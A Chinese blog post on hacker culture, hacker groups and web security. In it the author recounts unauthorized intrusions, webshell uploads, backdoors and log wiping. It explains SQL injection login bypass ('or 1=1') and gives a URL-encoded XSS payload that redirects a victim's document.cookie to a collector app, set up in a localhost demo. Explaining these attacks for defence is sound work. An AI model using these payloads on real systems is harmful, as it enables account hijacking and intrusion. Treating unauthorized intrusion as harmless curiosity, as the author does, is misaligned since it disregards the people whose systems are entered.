鄭重聲明：該篇文章未經(jīng)許可授權(quán)不得隨意轉(zhuǎn)發(fā)除博客園以外的任何地放，園內(nèi)轉(zhuǎn)發(fā)必須注明原文鏈接地址。文章觀點(diǎn)不代表任何團(tuán)體及組織，實(shí)屬個(gè)人觀點(diǎn)，行為！如果觸犯法律忘告知及時(shí)刪除。其它個(gè)人如果因本篇文章造成違法犯罪等不正當(dāng)后果者，本人概不負(fù)責(zé)。請(qǐng)慎重閱讀！上幾次有人對(duì)這里的聲明表示質(zhì)疑，簡(jiǎn)單闡述一下，我國(guó)互聯(lián)網(wǎng)辦法中明確規(guī)定有隨意散步不良言論導(dǎo)致后果嚴(yán)重者必懲！文章內(nèi)容比較敏感，親，慎重閱讀。就憑這一篇文章當(dāng)然說明不了安全，安全是一個(gè)長(zhǎng)期的工作，寬泛的領(lǐng)域，我后面想到神馬還會(huì)添加進(jìn)來。推薦看看文章提到的兩本書。

前幾天聽見媒體這樣報(bào)道“美國(guó)舊金山的知名黑客巴納比·杰克(Barnaby Jack)被發(fā)現(xiàn)身亡，年僅 35 歲。”首先我們對(duì)此表示默哀三分鐘！滴滴滴滴，，，，，，，，，，當(dāng)我聽聞的時(shí)候不禁大吃一驚，因?yàn)榍安痪梦覄倓偪催^這家伙的杰作那就是挖掘出ATM漏洞可以自動(dòng)吐錢（視頻地址：http://player.youku.com/player.php/sid/XNTg4MjIxNzg4/v.swf）同時(shí)這家伙他成功黑掉了多家廠商生產(chǎn)的心臟起搏器，只需十幾米之外的一臺(tái)筆記本電腦，就能讓它放出830V的電壓，足以致人死地。我立刻想到是不是這些廠商action？但是后來想想，作為黑客都是夜行動(dòng)物，幾乎白天不會(huì)做事情！所以他的死也算是一個(gè)損失吧。再次默哀！

為什么要講這個(gè)？大家應(yīng)該對(duì)這個(gè)新聞都知道了！其實(shí)我們就是要引出一個(gè)叫白帽黑客的名詞，這個(gè)不是一個(gè)組織，也不是一個(gè)團(tuán)體，應(yīng)該叫一類人，這些人大多都是網(wǎng)絡(luò)安全公司效力，專門挖掘系統(tǒng)漏洞，進(jìn)而改善系統(tǒng)，或者聘請(qǐng)別人來挖掘漏洞，他們來填補(bǔ)。比如google,apple等，每年都會(huì)組織黑客大會(huì)，來攻破挖掘自己系統(tǒng)或者app的漏洞！進(jìn)而獎(jiǎng)勵(lì)漏洞發(fā)現(xiàn)者，作為回報(bào)。

當(dāng)然上面的只是一類人，并不是所謂的黑客組織，下面我將通過自己的經(jīng)歷及自己了解到的為大家講述，首先我們需要了解神馬事黑客？為神馬叫黑客？黑客精神黑客文化，或許這個(gè)詞你大多都從別的地放了解到，可是我將講述還原一個(gè)真實(shí)的事實(shí)。廢話不多下面開始。

維基百科中是這樣講的：“黑客（英文：Hacker，或稱駭客），通常是指對(duì)計(jì)算機(jī)科學(xué)、編程和設(shè)計(jì)方面具高度理解的人”，這樣的解釋不難理解，當(dāng)然如果你年齡稍微大點(diǎn)，那或許你不用看這個(gè)你就知道，因?yàn)樵缙诘暮诳痛_是如此的一類，如果你看過Paul Graham寫的《黑客與畫家》那你或許會(huì)了解到真正意義上的黑客就是頂級(jí)程序員+頂級(jí)安全攻城師（https://news.ycombinator.com/這個(gè)網(wǎng)站就是）。為什么后面也會(huì)出現(xiàn)駭客的稱謂呢？或許今日的媒體記者在報(bào)道的時(shí)候標(biāo)題應(yīng)該叫“駭客”，而不是XXX黑客，在現(xiàn)在信息爆炸的時(shí)代媒體的報(bào)道手法為了吸引眼球，不斷地層出不群的抹黑黑客這一名詞。在國(guó)外早起黑客和駭客精神文化相互碰撞產(chǎn)生分歧的時(shí)期，我朝的這類人才也已經(jīng)涌現(xiàn)出來。黑客秉承黑客的文化精神，拯救互聯(lián)網(wǎng)。而駭客，用于破壞個(gè)人計(jì)算機(jī)竊取個(gè)人隱私，破壞互聯(lián)網(wǎng)為樂。慢慢的人數(shù)積累越多，各自都成立了自己的組織，我們叫他黑客組織。而駭客沒有自己的精神文化，而慢慢的衰落，直到今日在解釋黑客一詞的時(shí)候百度百科也罷，維基百科也罷都會(huì)出現(xiàn)或稱駭客，所以這個(gè)被埋沒的地放。

如果你明白了神馬是黑客了？那你就可以跟著我的腳步，一起解密神秘的黑客文化，黑客世界，當(dāng)然我也會(huì)通過自己的故事為大家講述。首先簡(jiǎn)單介紹一下筆者知道的所謂的黑客團(tuán)體（所謂就是忽略正義和非正義）下面列出曾經(jīng)有一次排名。

德國(guó)AllDas.de網(wǎng)站發(fā)布了全球排名前25位的黑客組織和個(gè)人，共1946個(gè)黑客組織和個(gè)人參與排名，Silver Lords黑掉864家網(wǎng)站位于榜首，中美黑客大戰(zhàn)中臭名昭著的美方黑客組織PoisonBOx位第二，“中國(guó)紅客聯(lián)盟”(H.U.C)黑掉126家網(wǎng)站（統(tǒng)計(jì)不全），排名第25位，（但由）

1) Silver Lords黑掉864網(wǎng)站，占總數(shù)的5.92 %

2) Poizonb0x黑掉629網(wǎng)站，占總數(shù)的4.31 %

3) Prime Suspectz黑掉435網(wǎng)站，占總數(shù)的2.98 %

4) Hi-Tech Hate黑掉348網(wǎng)站，占總數(shù)的2.38 %

5) Unknown黑掉340網(wǎng)站，占總數(shù)的2.33 %

6) Demonios黑掉313網(wǎng)站，占總數(shù)的2.14 %

7) Hackweiser黑掉277網(wǎng)站，占總數(shù)的1.9 %

8) Quit Crew黑掉242網(wǎng)站，占總數(shù)的1.66 %

9) WFD黑掉242網(wǎng)站，占總數(shù)的1.66 %

10) limit.br黑掉232網(wǎng)站，占總數(shù)的1.59 %

11) GForce黑掉206網(wǎng)站，占總數(shù)的1.41 %

12) Data Cha0s黑掉166網(wǎng)站，占總數(shù)的1.14 %

13) BHS黑掉156網(wǎng)站，占總數(shù)的1.07 %

14) WOH黑掉153網(wǎng)站，占總數(shù)的1.05 %

15) JNB黑掉152網(wǎng)站，占總數(shù)的1.04 %

16) xst黑掉150網(wǎng)站，占總數(shù)的1.03 %

17) USDL黑掉149網(wǎng)站，占總數(shù)的1.02 %

18) Supreme Entity黑掉148網(wǎng)站，占總數(shù)的1.01 %

19) C0BR4S黑掉140網(wǎng)站，占總數(shù)的0.96 %

20) fux0r Inc.黑掉140網(wǎng)站，占總數(shù)的0.96 %

21) Evil Angelica黑掉135網(wǎng)站，占總數(shù)的0.92 %

22) pr0phet黑掉130網(wǎng)站，占總數(shù)的0.89 %

23) cr1m3 0rg4n1z4d0黑掉129網(wǎng)站，占總數(shù)的0.88 %

24) InfernoZ黑掉128網(wǎng)站，占總數(shù)的0.88 %

25) H.U.C黑掉126網(wǎng)站，占總數(shù)的0.8%?

注：25)H.U.C是中國(guó)紅客聯(lián)盟，國(guó)內(nèi)唯一上榜組織。

上面的大多可能在后來的發(fā)展中相繼流產(chǎn)，下面介紹還有最近比較活躍的。

國(guó)外組織：駭客組織Anonymous（前不久攻擊過支付網(wǎng)站PayPal，日本街頭有組織的對(duì)抗政府）現(xiàn)在已知的全球最大的駭客組織，全球最大的政治性黑客組織。文化：宣揚(yáng)人權(quán)，政府透明性組織，自由組織，政治性黑客組織。成員：遍布全世界包括中華臺(tái)北，中國(guó)深圳。

國(guó)內(nèi)組織：中國(guó)紅客聯(lián)盟（簡(jiǎn)稱H.U.C）該組織依舊存在，國(guó)內(nèi)現(xiàn)在最具正義感組織，也為國(guó)內(nèi)或者全世界現(xiàn)存宣揚(yáng)黑客組織精神文化最好的網(wǎng)站（聲譽(yù)全世界），上面的排名就是其早期與全世界黑客作戰(zhàn)排名結(jié)果。文化：宣揚(yáng)黑客正義的力量，為自由，為國(guó)家榮譽(yù)而戰(zhàn)的中國(guó)黑客。網(wǎng)站核心思想：道，可道，非常道。名，可名，非常名。成員：高中以上遍布全國(guó)（香港，澳門，臺(tái)灣等地）。有人會(huì)問，為什么對(duì)該組織很了解，個(gè)人在其混了幾年時(shí)間，包括對(duì)黑客的認(rèn)識(shí)均大多來自于此。后面著重分析。

國(guó)內(nèi)組織：白帽子（網(wǎng)站烏云）,該組織興起不久，該組織合作于我國(guó)國(guó)家信息安全中心，文化：免費(fèi)嗅探各種互聯(lián)網(wǎng)漏洞，均以網(wǎng)站為核心提交漏洞.成員：大多為程序猿一族，當(dāng)然核心人員應(yīng)該是早起黑客一族。本人蝸居一段時(shí)間發(fā)現(xiàn)，該組織管理比較混亂，以提交漏洞而提交漏洞，各種浮躁之風(fēng)。可以稱之為社區(qū)不能成為真正意義上的黑客組織，因其核心人員名譽(yù)，在我朝還算知名。某寶的一名網(wǎng)絡(luò)安全攻城師也在這里，曾寫過一本《白帽子講 Web 安全》還是比較不錯(cuò)的。

國(guó)內(nèi)組織：更早期有綠盟，也是黑客組織，因其發(fā)展不穩(wěn)定后來改變策略，后來為企業(yè)提供安全服務(wù)。還有黑白網(wǎng)，也是比較早的駭客組織，該組織發(fā)行各種駭客雜志及手冊(cè)tool.這些都是很早期的，現(xiàn)在境況如何不知其所在。

好了，簡(jiǎn)單羅列以上個(gè)人知道的和有聲譽(yù)的組織，以上中只有中國(guó)紅客聯(lián)盟（H.U.C，下文都將采用H.U.C簡(jiǎn)稱）繼承者黑客精神文化，為正義二戰(zhàn)斗的一群夜行動(dòng)物，好吧姑且就叫夜行動(dòng)物。也是本文通過該組織講述黑客核心文化的一個(gè)極具代表的組織（沒有打廣告哦！吼吼~~~）

在講述H.U.C之前，我想講講本人的故事，其中會(huì)穿插引出H.U.C也就是黑客文化以及個(gè)人認(rèn)識(shí)看法。很多人有時(shí)候會(huì)問一個(gè)問題，就是為什么要學(xué)編程？又有很多人會(huì)說我要當(dāng)黑客，不錯(cuò)！這個(gè)理由貌似充滿各種神奇而又神秘的境遇。為神馬神秘？神秘的是你可以知道別人不知道的,你可以做到別人不能做到的。以前至少在互聯(lián)網(wǎng)上你能得知?jiǎng)e人所不能知道的消息。我就是因?yàn)槌踔械弥诳鸵辉~，高中各種肆無忌憚的跑到學(xué)校外面上網(wǎng)，就是為了學(xué)習(xí)黑客，搞到別人不知道的情報(bào)，能在別人面前吹噓別人不知道的東西！確實(shí)很爽(當(dāng)然現(xiàn)在低調(diào)低調(diào)再低調(diào)，不玩扣扣，不玩微博，不玩微信，不玩智能手機(jī)，只玩博客園閃存。)從那以后基本高一高二每周晚上都會(huì)出去上網(wǎng)幾次，為此我也付出了沉重的代價(jià)，FQ手被玻璃劃破鮮血直流，直到現(xiàn)在手指上的疤還在，這樣的付出讓我很早的就是知道了黑客的意義，黑客的行為，大多晚上活動(dòng)與互聯(lián)網(wǎng)的某個(gè)角落，學(xué)校微機(jī)課的時(shí)候可以遠(yuǎn)程關(guān)閉掉別人的計(jì)算機(jī)，當(dāng)時(shí)感覺很爽，可以通過DOS命令發(fā)送消息給指定的ip地址，可以動(dòng)過DOS潛入別人的電腦（當(dāng)然這些或多或少的大家都玩過，不過僅限xp以前的系統(tǒng)）慢慢的這一切覺得很有意思，每當(dāng)報(bào)紙新聞等爆出XX黑客攻擊，等字樣，我就要立刻的閱讀獲取第一手信息（當(dāng)然這個(gè)習(xí)慣現(xiàn)在還保留著）

后來接觸到一個(gè)電子書，大概就是某個(gè)黑客寫的一個(gè)自己的自傳，通過這個(gè)我了解了很多名詞，神馬后門，神馬蜜糖，神馬跳板，神馬弱口令，神馬sql注入，神馬肉雞，等等讓我知道黑客的路很遠(yuǎn)。不知道哪里看到了一個(gè)評(píng)論就是說用工具攻擊別人的人永遠(yuǎn)都是工具小子。

后來決定必須了解攻擊原理才能理解那些專業(yè)術(shù)語！所以大家懂了，走上了編程之路。當(dāng)然那個(gè)時(shí)候也是比較熱愛代碼的。慢慢的經(jīng)過學(xué)習(xí)，工作，一段時(shí)間的積累和在H.U.C有段時(shí)間的理解，有了編程功底，理解那些名詞很容易懂而且可以知道工具原理是神馬了。

其中在這段時(shí)間里，個(gè)人也友情檢測(cè)過很多網(wǎng)站，不過大多都是存在sql注入及跨站腳本，很多時(shí)候企業(yè)都是不注重服務(wù)器安全的，至少在我朝是這樣，早前這種情況簡(jiǎn)直不敢直視，漏洞蔓延很厲害，現(xiàn)在好多了！一般通過掃描后臺(tái)登陸page,注入獲取username+password登陸系統(tǒng)修改網(wǎng)站內(nèi)容， 上傳大馬（檢測(cè)網(wǎng)站一般上傳頁面的腳本木馬，通過這樣的方式提取更高權(quán)限，從而獲取webshell遠(yuǎn)程控制服務(wù)器，有人還會(huì)留后門方便下次進(jìn)入，所謂后門就是開啟遠(yuǎn)程控制服務(wù)端口，或者將上傳的馬隱藏的更深以便下次進(jìn)入。高級(jí)黑客還有一個(gè)習(xí)慣就是每次進(jìn)入你的電腦就像進(jìn)入你家一樣，先敲門，走的時(shí)候記得給自己留后門，還不忘打掃一番，這樣不會(huì)留下自己的腳印,啥？你不知道？就是刪除系統(tǒng)日志。當(dāng)然還有一部分比較粗暴型的就是直接代理ip）這個(gè)時(shí)候服務(wù)器就是你的了，不高興了想remove神馬就remove神馬，當(dāng)然我一般進(jìn)去都是看看，觀摩一番，不會(huì)做更大的動(dòng)作。駭客攻擊服務(wù)器的最終目的也是想拿到服務(wù)器最高權(quán)限。后來也在內(nèi)網(wǎng)潛入別人的計(jì)算機(jī)，看看基本不會(huì)亂動(dòng)別人的東西！當(dāng)然這些基本都是XP系統(tǒng)。自微軟windows7以上版本發(fā)布，很少有人去探索研發(fā)此類軟件，而且本身微軟的發(fā)行速度也是比較快的。導(dǎo)致很少有此平臺(tái)以上的漏洞（當(dāng)然這里僅談攻擊個(gè)人電腦，比如早前知名的熊貓燒香，灰鴿子都是針對(duì)個(gè)人及網(wǎng)吧用戶）。

當(dāng)然最近一次，就是內(nèi)網(wǎng)嗅探過公司用戶的個(gè)人pc，沒做任何事情，發(fā)現(xiàn)有四分之一的用戶還是xp，而且沒設(shè)密碼、在剛來博客園的時(shí)候發(fā)現(xiàn)閃存存在XSS漏洞，及時(shí)通知dudu，園長(zhǎng)大人很快修復(fù)。然后就是前幾天知名的struts2之Xwork 的ONGL漏洞，我也寫了實(shí)戰(zhàn)演示博文。抓到一大把的struts網(wǎng)站漏洞，有一個(gè)網(wǎng)站漏洞百出，直接給停止了！反省反省再上線。

至此個(gè)人的故事講述完畢，當(dāng)然很多人覺得講這個(gè)是在賣弄，或者跟本文無關(guān)，恰巧錯(cuò)了！我不能說自己是黑客，也不能說自己秉承黑客的精神文化，個(gè)人覺得黑客文化精神就是這樣的，崇尚自由，崇尚不破壞互聯(lián)網(wǎng)，不破壞個(gè)人信息安全，為正義而戰(zhàn)，為光榮而戰(zhàn)，只為追求世間真理而存在或者說互聯(lián)網(wǎng)沒有絕對(duì)安全的鑰匙。就像中國(guó)有句古話說的好：“沒有不透風(fēng)的墻”。當(dāng)然有人會(huì)覺得我是有點(diǎn)神話了！你錯(cuò)了！

現(xiàn)在我們來講講H.U.C，誕生的很早，在互聯(lián)網(wǎng)的浪潮中也沒有淹沒，反而而且改版，深受廣大愛好黑客精神文化的人員喜愛，為什么它能如此健康的發(fā)展？我總結(jié)了一下幾點(diǎn)：

1.有嚴(yán)格的將懲罰制度，網(wǎng)站人員作風(fēng)低調(diào)，行動(dòng)高調(diào)。

2.定期組織以打擊互聯(lián)網(wǎng)不正之風(fēng)為活動(dòng)的掃描拿站活動(dòng)（打擊黃、賭、毒、槍支販賣，貌似網(wǎng)站8月份又有一次活動(dòng)）

3,核心成員擁有秉承黑客精神文化。

4.不以利益為目的的存在。

網(wǎng)站發(fā)展早期曾經(jīng)多次與全球駭客抗衡（美國(guó)，日本，東南亞各國(guó)），這場(chǎng)沒有硝煙的戰(zhàn)爭(zhēng)打到現(xiàn)在，而網(wǎng)站的服務(wù)器也多次受到國(guó)外駭客攻擊，一度癱瘓，關(guān)閉！曾經(jīng)核心成員也都相繼各奔東西，但后來通過網(wǎng)站召回不少一直到現(xiàn)在，有句話叫一個(gè)男人的成熟就看他經(jīng)歷了多少風(fēng)雨。我們每次聽到國(guó)家領(lǐng)土受到威脅的時(shí)候都是這些人第一時(shí)間發(fā)起網(wǎng)絡(luò)攻擊，這一點(diǎn)很符合紅盟主旨但不是黑客文化。強(qiáng)調(diào)一點(diǎn)，這里不存在政治色彩。現(xiàn)在紅盟的發(fā)展本著發(fā)展祖國(guó)網(wǎng)絡(luò)事業(yè)，培養(yǎng)網(wǎng)絡(luò)英才，增加國(guó)人網(wǎng)絡(luò)安全意識(shí)的宗旨。這里不做過多介紹了，也不是本文重點(diǎn)。

如果你讀到這里了，你對(duì)黑客有所了解了，那我我們開始本文重點(diǎn)所要講述的內(nèi)容。著重講述web方面的安全，至于客戶端的安全現(xiàn)在基本很少有人可以的去攻擊個(gè)人pc,不過會(huì)講講一些基本的安全常識(shí)、服務(wù)器級(jí)別的安全也不是本文重點(diǎn)，服務(wù)器可能涉及的范圍更廣，需要更專業(yè)的安全攻城師、

第一章節(jié)：pc端安全

pc端安全，基本涉及到的是個(gè)人的pc安全，包括大多數(shù)常見的木馬都是基于windows xp級(jí)別的，就像上文提到的一樣，現(xiàn)在windows7及以上的版本很少有,你可能大概會(huì)問，為什么這樣講？首先不管黑客駭客，攻擊的個(gè)人pc的目的就是獲取個(gè)人資源信息或者出于愛好，而大多數(shù)用戶都是基于windows下，而windows生命周期最長(zhǎng)的一個(gè)版本就是xp，而xp的安全性又不是很高，即使填補(bǔ)，也是道高一尺魔高一丈。生命周期長(zhǎng)了，讓駭客有精力也有時(shí)間去研發(fā)各類攻擊軟件。早起我們聽說過的熊貓，灰鴿子，都是很強(qiáng)大的遠(yuǎn)控軟件，更高級(jí)的功能還具有遠(yuǎn)程內(nèi)網(wǎng)穿透功能（神馬？你不知道內(nèi)網(wǎng)穿透？意思就是攻擊者通過外網(wǎng)的ip掃描到遠(yuǎn)程內(nèi)網(wǎng)段的ip，進(jìn)而對(duì)內(nèi)網(wǎng)的用戶發(fā)起攻擊）受害最多的或許就是網(wǎng)吧的電腦，很多駭客早起用這玩意，抓取大量肉雞供自己消遣娛樂！如果你玩游戲（賬號(hào)被盜后基本都是刷裝備，然后到網(wǎng)絡(luò)黑市交易牟利，當(dāng)然這類人大多數(shù)不懂駭客，而是花錢買工具自學(xué)，當(dāng)然也有一部分人專門做這個(gè)！比如曾經(jīng)我見過一個(gè)勁舞團(tuán)的外掛買到100-200那個(gè)時(shí)候已經(jīng)夠高了！早期的數(shù)據(jù)不加密，基本大多都是采用C++編寫修改內(nèi)存欺騙服務(wù)器）、扣扣（曾經(jīng)有一個(gè)論壇專門研究扣扣的協(xié)議，這下你明白早期你的號(hào)碼被盜了吧！）等等發(fā)現(xiàn)號(hào)被盜了,很可能你的機(jī)器被人抓雞了，灰鴿子有自動(dòng)上線提醒，只要肉雞上線就能實(shí)時(shí)監(jiān)控！可怕吧！

其實(shí)這類遠(yuǎn)控都是有客戶端，服務(wù)器端，前者就是發(fā)送給受害者，后者就是駭客控制端。為什么還能中招？就是因?yàn)楹芏嗳藢?duì)系統(tǒng)安全設(shè)置不夠，當(dāng)時(shí)殺毒基本都是通過文件名來查殺，很多加殼過的，加花代碼基本都會(huì)繞過殺毒。

安全意識(shí)差的用戶就會(huì)接受黑客發(fā)過來的客戶端，當(dāng)然黑客不會(huì)傻到直接發(fā)exe，當(dāng)然是一個(gè)偽裝過的文件，比如：圖片文件打開的時(shí)候就會(huì)遠(yuǎn)程下載木馬客戶端到本地，都是影藏掉的。還有就是大多數(shù)用戶guest用戶開啟、遠(yuǎn)程端口開啟、弱口令（admin/admin,之類的很容易被人猜解的）通過合法遠(yuǎn)程登錄。然后創(chuàng)建駭客的賬號(hào)密碼以便下次進(jìn)入，最后遠(yuǎn)程開啟telnet，登錄，這個(gè)時(shí)候你的機(jī)器就是人家的了！想干嘛干嘛，即使有殺毒軟件，立刻運(yùn)行net stop 服務(wù)器名 ，殺毒軟件就死翹翹了！當(dāng)然你可能猜你的密碼較安全？錯(cuò)，駭客有黑客字典，暴力破解。類似于你家門鎖了，他會(huì)拿很多的鑰匙去開門，不巧，成千上萬把的鑰匙總會(huì)有一把會(huì)破解。當(dāng)然還有更可惡點(diǎn)的就是軟件捆綁，有些人寫的軟件里面會(huì)捆綁木馬安裝！還有更厲害的就是研究網(wǎng)絡(luò)協(xié)議，攻擊你們家的路由器，攔截?cái)?shù)據(jù)包，要知道那個(gè)時(shí)候數(shù)據(jù)加密很少，大多數(shù)消息都是赤裸的傳遞，駭客很輕易地就能解析數(shù)據(jù)包（當(dāng)然現(xiàn)在還有人在做這些，只不過難度很大了，現(xiàn)在的數(shù)據(jù)都是加密過的！但是也不是不能破解的!）

當(dāng)互聯(lián)網(wǎng)各種木馬蔓延的時(shí)候，殺毒軟件乘風(fēng)波浪的來了，對(duì)！就是這個(gè)時(shí)期，各家殺毒軟件為了爭(zhēng)寵，相繼使出各種的風(fēng)騷弄姿，確實(shí)杜絕了一些木馬的運(yùn)行！但是記得他們的殺毒都是表面的還是不能完全值得用戶認(rèn)可！最后一個(gè)時(shí)期就是殺毒軟件明爭(zhēng)暗斗的時(shí)期，當(dāng)然這個(gè)事情他們確實(shí)下功夫了，建立自己的病毒庫，采取掃描內(nèi)容殺毒，脫殼掃描，直到windows7現(xiàn)在市面上常見的病毒幾乎無法正常運(yùn)行！

駭客到了這個(gè)時(shí)期幾乎淘汰了一大批了，你可能會(huì)問為什么？因?yàn)檫@就是一次革新，僅僅會(huì)用tool的駭客就沒用武之地了，因?yàn)閹缀鯖]人寫這種針對(duì)pc端木馬！技術(shù)高手都相繼轉(zhuǎn)移服務(wù)器端，因?yàn)檫@個(gè)事情也是我朝互聯(lián)網(wǎng)發(fā)展的一大時(shí)期，人們漸漸地對(duì)互聯(lián)網(wǎng)有更多的認(rèn)識(shí)，大多的數(shù)據(jù)都保存在服務(wù)器。這個(gè)就是接下來我們的重點(diǎn)服務(wù)器端安全。

?

第二章節(jié)：服務(wù)器安全

服務(wù)器顧名思義，就是提供用戶服務(wù)使用，一般為企業(yè)級(jí)眾多受眾范圍廣，所以服務(wù)器的安全是不可忽略的事情。再講之前我們先講兩個(gè)發(fā)生在離我們最近的故事，不久之前號(hào)稱國(guó)內(nèi)知名某某開發(fā)者論壇數(shù)據(jù)庫被爆菊花，駭客地下售賣這些幾百萬的用戶信息。最后浮出水面，各大網(wǎng)絡(luò)下載鏈接出現(xiàn)。隨后就爆出好幾個(gè)門戶（包括網(wǎng)易郵箱）及游戲網(wǎng)站都是如此密碼明文保存。各大媒體雪上加霜似的各種頭版頭條報(bào)道，不可否認(rèn)的是，那個(gè)時(shí)期我朝的互聯(lián)網(wǎng)確實(shí)還是正發(fā)展時(shí)期！沒有建立更好的安全意識(shí)，出現(xiàn)問題依然高姿態(tài)的故作鎮(zhèn)定！當(dāng)然現(xiàn)在都改掉了這些壞習(xí)慣，基本很小的網(wǎng)站他都知道用MD5加密或者其他加密算法(現(xiàn)在MD5加密也能被破解了，最好的辦法就是加點(diǎn)鹽，意思就是采用用戶名+密碼的方式加密，老外用彩虹表跑MD5很輕松的。有些國(guó)外駭客還用這個(gè)賺錢，跑一個(gè)MD5多少刀)。很好，從這個(gè)故事中我們可以得出一個(gè)結(jié)論：戳到他痛處的時(shí)候他就知道錯(cuò)了！他就會(huì)改的!但是我們僅做好這些就好了嘛？顯然不夠，我們切不談服務(wù)器本身的安全問題，這里著重講講流行的webapp攻擊手法，可能或多或少你也了解。然后說說從哪些方面杜絕這些低級(jí)錯(cuò)誤。加強(qiáng)我們的安全。買了那么多廢話，我們?cè)撝v講實(shí)用的了，因文章篇幅更多的介紹原理，及防范措施！基本不會(huì)演示。

提綱：1、SQL注入攻擊。

2、XSS跨站腳本攻擊。

3、DDOS攻擊。

4、文件上傳漏洞。

?

下面我們通過講解和例子，來闡述其原理及如何來防范這些現(xiàn)在已經(jīng)流行的攻擊手法。

SQL注入攻擊：

這個(gè)漏洞想必很多人都知道，而且現(xiàn)在流行的各種開發(fā)框架幾乎都可以杜絕這種低級(jí)錯(cuò)誤，當(dāng)時(shí)有些時(shí)候可能有些coder自己寫的一些sql就可能會(huì)忽視。駭客手里的sql注入工具都是成批量的檢索漏洞，而且內(nèi)置了基本常用額字典。這里不做太多講講，網(wǎng)上信息一大把，講講核心的和注意的地放。

攻擊手法：在連接的后綴(比如：http://www.abc.com/news.action?id=1 )加 and 1=1 ,沒報(bào)錯(cuò)正常訪問， ok！然后換and 1=2 如果出現(xiàn)數(shù)據(jù)庫錯(cuò)誤，ok這個(gè)網(wǎng)站存在注入。要是登陸界面存在1=1那你就可以繞過他的驗(yàn)證！直撲首頁了！ 如果沒有接下來的工作就是 and exists(select * from 表名)各種的揣測(cè)，如果不湊巧你的表名被猜中那你數(shù)據(jù)就被獲取了。獲取到用戶登錄表，駭客就可以根據(jù)用戶名密碼登錄！但是有一點(diǎn)人一般我們的后臺(tái)登陸是影藏過的駭客不好找，駭客得到用戶密碼不知道在哪里登陸？呵呵，這個(gè)可是駭客萬水千山的第二個(gè)難題，不過他們手里一般都有很成熟的批量掃描后臺(tái)登陸頁面的工具，準(zhǔn)確率達(dá)70%左右，你會(huì)說不可能？錯(cuò)了！這些里面也是內(nèi)置字典，也可以自定義，經(jīng)過漫長(zhǎng)歲月的積累這些字典的命中率極高（到這里想有點(diǎn)題外話，前不久有媒體曝某招聘節(jié)目51job被黑客攻擊，當(dāng)然看過節(jié)目的都知道，不過我想講的是那童靴簡(jiǎn)直就是侮辱我朝黑客的智商，最起碼我朝黑客也是在國(guó)際上出來名的，他竟然宣稱自己找到51job的后臺(tái)登陸頁面，然后大肆的宣揚(yáng)自己攻擊了51job，以至于媒體的標(biāo)題買點(diǎn)就是51job被黑客攻擊，我當(dāng)時(shí)立刻打開節(jié)目，結(jié)果我聽到的是他找到51job的登陸界面！我擦，我當(dāng)時(shí)暈倒啊，真想給這小子一巴掌。有人會(huì)說那小子無辜滴，媒體宣揚(yáng)！不過我看那小子口口聲聲撕咬不放自己是黑客。好了，拿你沒辦法！）下面看圖，我建了一個(gè)測(cè)試數(shù)據(jù)庫及表，通過mysql——sql語句演示上面的執(zhí)行結(jié)果會(huì)發(fā)生神馬變化！

《圖1.1》

圖1.1中第一條sql就是我們一般驗(yàn)證用戶sql沒什么特別，但是看第二條通過第二天我們得到了該表的數(shù)據(jù)總數(shù)。那么我們?nèi)绾潍@得表內(nèi)容呢？很簡(jiǎn)單！看下圖

《圖1.2》

圖1.2中我們可以看出數(shù)據(jù)全部被顯示出來。or的意思大家都知道，滿足其一就可以！假使我們輸入的用戶密碼完全不存在那也可以查出所有的內(nèi)容！其實(shí)說白了，1=1就是這條sql永遠(yuǎn)都是true可執(zhí)行的。

防范措施：當(dāng)然過濾非法字符（前后臺(tái)都要過濾，有些前端過濾就是擺設(shè)！駭客有瀏覽器插件立刻繞過你的前端驗(yàn)證！直接無視!），這個(gè)指標(biāo)不治本，上面的那些都是后臺(tái)拼裝sql惹的禍。所以我們最好還是不要拼裝sql，現(xiàn)在框架都基本是ORM映射！還可以通過預(yù)編譯sql來完成(比如：存儲(chǔ)過程)

?

XSS跨站腳本攻擊：

這個(gè)有些人也玩過，不過這里能我們這次連同cookie盜取一塊來演示，也算是這幾個(gè)里面最有搞頭的一個(gè)。很多駭客或者取樂的玩家都是發(fā)個(gè)鏈接給別人然后異地盜取別人的cookie登陸該用戶。當(dāng)然這個(gè)代價(jià)有點(diǎn)高，一般需要一個(gè)網(wǎng)站來支持你盜取的cookie遷移。所以這里我測(cè)試的時(shí)候建立發(fā)布了兩個(gè)項(xiàng)目來實(shí)現(xiàn)cookie移花接木之術(shù)！首先建立了兩個(gè)項(xiàng)目一個(gè)是Test，一個(gè)是Demo，Test是一個(gè)存在XSS漏洞的網(wǎng)站！Demo是我用來遷移我發(fā)給某人一個(gè)連接，某人點(diǎn)擊后盜取該用戶的cookie（當(dāng)然這個(gè)cookie就是該用戶登錄過該網(wǎng)站）然后我通過盜取的cookie，實(shí)現(xiàn)不用輸入密碼賬號(hào)自動(dòng)就能登錄被我盜取賬號(hào)！好了廢話不多，開始演習(xí)！

準(zhǔn)備工作，開始之前為了保證數(shù)據(jù)的準(zhǔn)確性，我都刪除了連個(gè)瀏覽器的cookie.如下圖：

《圖2.1》《圖2.2》

接下來要做的就是發(fā)布項(xiàng)目，發(fā)送XSS跨站連接給我的目標(biāo)用戶，當(dāng)然這里的目標(biāo)用戶就是我了撒！哈哈！看圖講故事！

先假設(shè)某人登陸這個(gè)系統(tǒng)如下圖：

《圖2.3》《圖2.4》

圖2.3admin上方的輸入框就是存在XSS漏洞的、接下來就是我們生成好自己的跨站腳本發(fā)出去即可，只要有人點(diǎn)擊就ok中招！發(fā)到論壇帖子都可以！

http://localhost:8080/Test/Test?username=%3Cscript%3Elocation.href%3D%22http%3A%2F%2Flocalhost%3A8080%2FDemo%2FXSS%3Fid%3D%22%2Bdocument.cookie%3C%2Fscript%3E(等號(hào)后面翻譯過來就是<script>location.href="XXXX.com?id="+document.cookie</script>手法很多這只是其中之一)

上面的連接就是我的測(cè)試加花過的連接，否則別人一眼識(shí)破，所以很難中招，我們就需要編碼加花！這樣欺騙成功撒！

接下來就是觀察我的Demo應(yīng)用也就是遷移cookie用的，看看是不是有人點(diǎn)擊了，打印出來了他的cookie.

《圖2.5》

上圖中當(dāng)然就是我通過火狐訪問上面的連接，然后在Demo應(yīng)用的控制臺(tái)打印到的Test應(yīng)用當(dāng)前登陸用戶的cookie了。接下來就是我們拿到這個(gè)cookie干嘛呢？不要著急！我們先用另外的火狐瀏覽器訪問以下Test確保沒有登錄！

《圖2.5》《圖2.6》

